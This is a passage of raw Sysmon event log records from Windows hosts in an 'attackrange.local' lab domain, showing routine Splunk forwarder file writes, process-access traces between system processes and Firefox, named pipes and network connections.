Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E2F5E099201459162893BB8C296C6F0,SHA256=964F2F88DA528AAAF54C546C4979CC46C4A7696486BD33D34967105A48F20EB1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:05.790{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B76D2F2485CA2FFD44A5F3CC02A45BCF,SHA256=214D58C3572CCE971B5C8EC8A351A8DC8B21C5AE8D8A9D2C2F96D03C849FC33C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808609Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.762{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A60EA443FC37C0E21356BBA69B042EE4,SHA256=6B752A2D620A6FE228415B3B508A004D45FB20F1F5BF6FBF9A374A79F969A56B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051553Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.824{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3055872DA73E40B4AFF2BE562F887353,SHA256=A2F20943899345980ABC43B17B2658F30E9513837942A51E431804172450C8FF,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808608Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.269{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57340-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000808607Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808606Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000808605Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:06.247{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1500-00000000D001}1160C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001051552Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.342{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\storage\default\https+++twitter.com\idb\1046228012scyn.sqlite-shmMD5=B7C14EC6110FA820CA6B65F5AEC85911,SHA256=FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051551Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 10341000x80000000000000001051550Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}89445812C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-5563-60E8-2010-00000000CF01}4048C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+3e7611|C:\Program Files\Mozilla Firefox\xul.dll+121488e|C:\Program Files\Mozilla Firefox\xul.dll+140c86d|C:\Program Files\Mozilla Firefox\xul.dll+1223271|C:\Program Files\Mozilla Firefox\xul.dll+12192da|C:\Program Files\Mozilla Firefox\xul.dll+2208260|C:\Program Files\Mozilla Firefox\xul.dll+221acda|C:\Program Files\Mozilla Firefox\xul.dll+2201919|C:\Program Files\Mozilla Firefox\xul.dll+2201645|C:\Program Files\Mozilla Firefox\xul.dll+2205190|C:\Program Files\Mozilla Firefox\xul.dll+2216ecd|C:\Program Files\Mozilla Firefox\xul.dll+22213c8|C:\Program Files\Mozilla Firefox\xul.dll+2220a14|C:\Program Files\Mozilla Firefox\xul.dll+220bbd6|C:\Program Files\Mozilla Firefox\xul.dll+40976|C:\Program Files\Mozilla Firefox\xul.dll+3f85a|C:\Program Files\Mozilla Firefox\xul.dll+120351f|C:\Program Files\Mozilla Firefox\xul.dll+3f65e|C:\Program Files\Mozilla Firefox\xul.dll+dabd27|C:\Program Files\Mozilla Firefox\nss3.dll+fac5a|C:\Program Files\Mozilla Firefox\nss3.dll+ee441|C:\Windows\System32\ucrtbase.dll+1fb80 18141800x80000000000000001051549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-ConnectPipe2021-07-12 07:58:06.290{466BC892-3462-60E8-100C-00000000CF01}8944\chrome.4048.410.173757834C:\Program Files\Mozilla Firefox\firefox.exe 17141700x80000000000000001051548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-CreatePipe2021-07-12 07:58:06.290{466BC892-5563-60E8-2010-00000000CF01}4048\chrome.4048.410.173757834C:\Program Files\Mozilla Firefox\firefox.exe 23542300x80000000000000001051554Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:07.843{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE1CE47621DF9C1BF5D2634988302A46,SHA256=641C85521DD71B89F603115F511CF03E8281B6E570802F7342987D7779350651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808613Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1EEBE2C06EF2D8BB7AF14B4C8A2A6030,SHA256=5BC696FEBA1286FF1E332051C8DACC7B39DE15B6DF315B6937D9FE77987D540D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808612Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.950{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=553305B75748855F39A50CF0F006E81A,SHA256=222F05C44E68D3CF6F69BD989D8F06B73AC15C9F03CA67546E141D4EDB4AF379,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808611Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:07.778{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99EE8A85E19C95BC5B023DCE0EE0400C,SHA256=5D380AB7BA5CD8672E701F2176A5A450374E1D3E35C2625EB48B71C12934329E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808610Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:05.919{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.218-28189-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001051555Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:08.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F78D3E0C18A3975E460200E0D9DECCFB,SHA256=F7AAC2CB75316B8CC0BC6D2A304BFC33C425865FE987E4E82A081B9FC4DAA86B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808614Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:08.809{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=283BA790D4A4CC7EF0A8D5C45AAD0833,SHA256=F3B686F51EEC6E5F89FA7563BC574564FB6657C7DB1E18CDDA2E26B3E2099068,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808615Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:09.825{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8819D6821365326D923B5D433D9E9754,SHA256=25763D27E8C0979F0BCB74DC8972EA97DA2E70C7A2A0768ABC30BE34F8901C59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051557Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:09.889{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39409DFCD06447886E8199575A756D19,SHA256=95FBEDA8E91A5AABFAE459D48C2AE0F44E5289D3A4CB4A4966D0A16C4D603120,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001051556Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:00.678{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51107-false10.0.1.12-8000- 23542300x8000000000000000808616Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:10.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FF08C544619881AA26ED9FC5BE1B339,SHA256=6DDD3840241D780AAAE9057293BB08B467DA864F8FC30F10A181F103A939B8D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051558Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:10.904{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C149BF76FD62EBC413F26590BCB2960,SHA256=AC754878EE34F9096A54CCF988AEBC19BE3310411F1958836BECA9669194DD6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051559Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:11.921{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C82A094D148E84CA1B5B7A4EEEB0CCA,SHA256=12BB92A14D20860FEC2A65EB010BB515036826EE0D5828141CF2F463D5C43BFF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808617Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:11.840{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95621E17395880039DF124255F4253C,SHA256=171016CE65DAFBAE23C7D5003CD218C8B07F89EB9F8A5F014B647F3F3CDC5EB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051560Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:12.941{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AC7D0C86EAD7301D9962C06B296319E,SHA256=7DA4B41D11DCF3EE5838733E4B981E94CCC2B85440B8E3B107975901CC03DC20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808619Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:12.872{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EE5B9D6B8E0FDD5947E3A55689EBFF80,SHA256=08B5F6F0F4E67AE0447BD1A2A53C0FC603A25D271DA318B41E216D16FB466275,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808618Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:11.223{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57341-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808620Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:13.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E0CD3A7EFD19B143322A98BF06EDE5D,SHA256=EACF2EC656C4360D3E12E165ECA4BEE54E2C57945CC2CF7998AB853741F0538F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051561Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:13.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93196A9A9E8050A063F1212AE851D808,SHA256=9E92CF6806150F0A98717B58625DDB0384E27F45E8336D23696C6DCE13E2FB73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808621Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:14.915{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F329132AA50C1557BD5092E38AC01F14,SHA256=999B317B24AF1DD5E3D8A76C4956361D5470C8F97B75BE14B60C2D5DB5CC2764,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051562Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:14.971{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C01B9B350F7C2A9BBE7B07C3994CB70,SHA256=9DFBC7BCD5D477C677CF8B60D8607C7D15C8CF44DF3720DC4F6CCBFE0381A1F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808622Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:58:15.931{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78E4C463D98F523E60FBD36051B54A81,SHA256=E4A25C9FE927628FB01CCC2F0DE0EF9433F1E39E533BC614E7FC19DB291F366D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001051637Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.986{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=97514EA590D25102667B5A3D4E1849DC,SHA256=FF1410F4D30797AE9BC28126EEE9B12FBAE874DFE1B6822E94A3F250E5D1B091,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001051636Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051635Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051634Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051633Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051632Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051631Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:58:15.839{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001051630Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 